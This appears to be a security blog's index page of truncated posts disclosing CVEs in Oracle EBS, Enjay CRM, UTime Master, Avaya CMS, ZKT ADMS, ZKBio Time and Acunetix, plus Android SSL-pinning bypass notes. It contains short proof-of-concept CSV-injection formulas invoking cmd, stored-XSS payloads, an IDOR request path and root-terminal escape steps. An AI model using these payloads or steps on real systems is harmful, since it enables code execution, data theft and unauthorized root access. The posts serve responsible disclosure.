Info Sec & Developers Blog

Hello Readers, (Sorry for lengthy article) In 2022, researcher Orwa Atyat discovered a critical vulnerability ( CVE-2022-21500 ) in Oracle E-Business Suite, allowing attackers to register accounts, access the “Manage Proxy” page, and retrieve sensitive user data. Additionally, the Diagnostic Console could be abused to run SQL queries and extract passwords. To address this, Oracle released patches and organizations implemented workarounds such as: Identity Gateways – Redirecting login attempts through solutions like Oracle IDCS or ForgeRock. Disabling Registration – Removing self-registration links or URLs (ibeCAcpSSOReg.jsp) to prevent account creation. Hiding Settings – Removing access to the “Manage Proxy” option from the UI. Blocking Access – Disabling the “Manage Proxy” page entirely. Despite these measures, I successfully bypassed all four controls. Oracle acknowledged two of my findings ( Here ) and assigned the following new CVEs: CVE-2025-30707 – Oracle iStore (12.2.3–12.2...

  Enjay CRM is a collection which contains the CRM software along with Linux Ubuntu, however normal user don't have access to the underlying OS. Once the OS boots its runs the Enjay CRM software which has multiple read-only options.  However some of these options opens a terminal to perform a specific activity, This terminal is unrestricted and user can access the underlying OS as a ROOT and can run any command on OS. Underlying OS can be accessed using two methods; Also CVEs are assigned to these findings. 1. Using Ping menu (CVE-2024-41308):  it will open a terminal and user can click on File menu -> New Tab/New window. And root level terminal will be open. 2. Using Hardware info (CVE-2024-41309): Once the Hardware info page opens click on Help menu and either select "Open HardInfo Website" or "Report bug", it will open an unrestricted terminal where user can click on File menu -> New Tab/New window. And root level terminal will be open. Both the vulner...

    Hi All, I was able to identify CSV Injection Vulnerability in one online attendance system i.e. GRANDING UTime Master (v  UTime Master_9.0.7-Build:Apr 4,2023 ).  UTime Master is a powerful web-based time and attendance management software that provides a stable connection to GRANDING’s standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and working as a private cloud to offer employee self-service by mobile application and web browser. Login to UTime Master using admin account Click on Personnel > Employee Management >Employee Select Any employee or create a new employee In First name Section embed you payload. For test case I used " =cmd|' /C notepad'!'A1' " CSV payload embed in EMP NAME field. Once submitted, the CSV payload will be visible in First Name Field. Click on export button and click on CSV Export. CSV payload embedded in EMP NAME field. Open the exported file and payload will be executed successfully. I have also observed mul...

  Hi All, I was able to identify IDOR Vulnerability in one online attendance system i.e. GRANDING UTime Master (v  UTime Master_9.0.7-Build:Apr 4,2023 ).  CVE ID: CVE-2023-45393 UTime Master is a powerful web-based time and attendance management software that provides a stable connection to GRANDING’s standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and working as a private cloud to offer employee self-service by mobile application and web browser. Using IDOR any user of the application can fetch Logs which are only meant to be accessible to administrators only. These logs also contains sensitive information like user password which is used to do the attendance by employees. Login to UTime Master using any account. Capture the request in burpsuite with the valid cookies. modify the URL to "/base/adminlog/table/?page=1&limit=200" Forward the request and it will fetch all the admin logs. IDOR has been fixed in latest versions after 9.0.7-Build:A...

  Hi All, I was able to identify stored XSS in one online attendance system i.e. GRANDING UTime Master (v  UTime Master_9.0.7-Build:Apr 4,2023 ). CVE ID: CVE-2023-45391 UTime Master is a powerful web-based time and attendance management software that provides a stable connection to GRANDING’s standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and working as a private cloud to offer employee self-service by mobile application and web browser. Login to UTime Master using admin account Click on Personnel > Employee Management >Employee Select Any employee or create a new employee In First name Section embed you payload. For test case I used "/><img src=a onerror=alert(22)> XSS payload embedded in EMP NAME field. Save the employee details, Once the page refreshed it will execute your payload. our payload executed successfully. I have also observed multiple other fields are also vulnerable to XSS e.g. Device Name, Department etc. XSS has be...

 Hi All, I was able to identify CVS injection vulnerability in Avaya Call Management System (CMS). Avaya Call Management System (CMS) is an integrated analysis and reporting solution that keeps you in touch with virtually everything that’s going on in your contact center from evaluating the performance of a single agent or group of agents to managing a contact center with multiple locations worldwide. During the security assessment of CMS Supervisor Web application, i noted that whole section of "Administration" has a feature to download the content in CSV format. Any malicious user can inject malicious CSV payload, which will be executed if the admin downloads the csv report and opens it. The Excel will ask the admin to enable the content, since the report is downloaded from trusted source he will click on enable which will execute the content. Vulnerability and Fixed: Vulnerability Name : CMS is vulnerable to CSV Injection Assigned CVE:  CVE-2023-3527 ASA Num...

 Hi All, I was able to identify stored XSS in one online attendance system i.e. ZKT Eco ADMS (v 3.1-164 )(Automatic Data Master Server) is a powerful web-based time and attendance management software. which is used to configure the attendance devices and manage its users. Cve ID assigned CVE-2022-44213: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44213 Technical details Login to ZKT Eco ADMS (default admin/admin) Click on System and click on Employee Click on Append button to add new Employee In Emp Name field Add your XSS payload. For testing I have used a non malicious code "/><img src=a onerror=alert('stored-XSS');> Click on Submit button, it will redirect you to the employee list, and our payload will be executed. XSS payload embedded in EMP NAME field. our payload executed successfully. XSS has been fixed in latest versions after 3.1-164.

 Hi all, Recently I have faced an issue where I was sending windows logs to my logs collector, however the logs were sent in below format Timestamp, System Hostname , Event-ID, etc etc Since to resolve the hostname to IP address the collector needed access to local DNS server, but there is no local DNS :-P So there are 2 solutions. Create local DNS server, and add all the entries of all the hosts and point the logs collector to this local DNS. Find some work around to be implemented on all the server so it can convert the hostname to its local IP before forwarding it to the logs collector. After googling for around 4-5 hrs. I wasn't able to find any proper solution, every solution which I was reading were converting IP to hostname. So I started reading the documentations of NXLOG and found a core function which can be used to convert the Hostname to Host IP.  Lets assume you have already configured the INPUT entity in the NXLOG config file and you know which logs to be co...

 Hi all, I am here with new post. Recently I have identified a csv injection vulnerability in one of the web-based time and attendance management software. Below are the details: Software Description: ZKBio Time is a powerful web-based time and attendance management software. With a powerful data handling capacity, the system can manage the attendance data of 10,000 employees. It can easily handle hundreds of devices and thousands of employees and their transactions. ZKBio Time comes with an intuitive user interface is able to manage timetable, shift and schedule and can easily generate attendance reports. Impacted Version: 8.0.7 (Build: 20220721.14829) and before. CVE ID: CVE-2022-40472 Vulnerability details: Login to ZKBio Time Application In the left Menu click on Messages -> Public Click on ADD new message button Write your Device Serial Number Mention any date/time and duration In Content Field Add your CSV injection payload. As shown below Any user who extract th...

 Hi All, So today i was testing one exploit but on windows it was not showing the colors which was very annoying, i tried to install colorama, termcolor. however nothing worked, the exploit was still showing ASCI instead of colors. as shown below After alot of search i was able to fix it, it requires alittle modification of the exploit. 1st make sure to  install colorama, termcolor. For Python 2.7 x pip install colorama pip install termcolor For Python 3x pip3 install colorama pip3 install termcolor Next open the file in notepad or any other editor and add below lines at the start of script; import os os.system("") Save the script and re-run it, it will give start showing the color codings Thanks

 Hi all,  I was using Acunetix version 13.0.201217092 for scanning purposes back in Jan 2021, and I was able to identify CSV Injection vulnerability in the web scanner. Any user who is not the administrator can perform these actions which can lead to admin system compromise. For testing I used the Admin account. Lets get to the technical details. CVE ID Assigned:  CVE-2022-29315  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29315 https://www.cve.org/CVERecord?id=CVE-2022-29315 Vulnerable Version: Before version 14 Fixed Version: 14 and 14+ # Software description: Acunetix by Invicti Security is an application security testing tool built to help small & mid-size organizations around the world take control of their web security. # Technical Details & Impact: It was observed that Target page is vulnerable to CSV Injection, using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting...

 So As discussed in Part 1, the 1APP has implemented another trick to avoid bypassing SSL Pinning. Before they were focusing on CA certificates present in device. Which we were able to bypass by putting our burpsuite certificate in CA directory. Now After update the Old trick was not working. To understand the implemented fix, I have decompile the APK again and In "resources\res\xml" directory I checked for "network_security_config.xml" after reviewing the XML file I Saw a new entry like <trust-anchors>             <certificates src="@raw/myAPP"/> </trust-anchors> This means that they have embedded their own certificate in "\resources\res\raw" directory with "myAPP" name. which means that application will not accept any certificate (CA/system or User) from device, it will only use myAPP certificate which is embedded in APK. I have tried multiple attempts to bypass it however every time I manipulate the APK file and tri...

 Hi everyone as you are aware I update this blog when I get stuck in some situation and after multiple attempts if I bypass that situation I write a blog about it. So today we will be discussing multiple issues which I faced while bypassing SSL pinning in one Application. lets call it 1APP So 1APP is configured in a way that normal installing burpsuite certificate in Andriod was not working. Running the application with normal burp certificate it was giving error like "java.security.cert.certpathvalidatorexception" webhook etc. After decompiling the app using online tools or you can use APKTOOL. In "resources\res\xml" directory I checked for "network_security_config.xml" after reviewing the XML file it was clear application is only trusting those certificate which are installed in CA directory of Device. So it was cleared that we have to copy our certificate to Android CA directory. After alot of searching I came across an awesome article where he explaine...